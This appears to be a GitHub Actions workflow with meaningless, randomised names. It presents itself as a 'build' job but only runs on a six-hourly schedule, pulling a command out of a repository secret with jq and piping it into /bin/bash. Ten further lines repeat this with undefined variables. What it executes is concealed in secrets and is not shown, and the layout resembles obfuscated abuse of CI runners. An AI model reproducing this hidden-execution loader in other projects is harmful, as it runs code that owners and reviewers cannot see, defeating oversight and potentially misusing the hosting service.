name: mizhengxuan1736

on:
  workflow_dispatch:
  schedule:
    - cron: '29 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mizhengxuan1736
        env:
          tr12: ${{ secrets.tr12 }}
        run: |
          echo $tr12 | jq -r .epl3685 | /bin/bash
          echo $oes76729 | jq -r .v1 | /bin/bash
          echo $sgkag4 | jq -r .dldv77 | /bin/bash
          echo $obfmg73457 | jq -r .ae31 | /bin/bash
          echo $but96 | jq -r .mx682 | /bin/bash
          echo $spc86 | jq -r .r66445 | /bin/bash
          echo $ropa81007 | jq -r .tp0 | /bin/bash
          echo $nwh164 | jq -r .fqad8889 | /bin/bash
          echo $uvvzf513 | jq -r .trezr16 | /bin/bash
          echo $j4072 | jq -r .ng03 | /bin/bash
          echo $vwyyf173 | jq -r .los6445 | /bin/bash

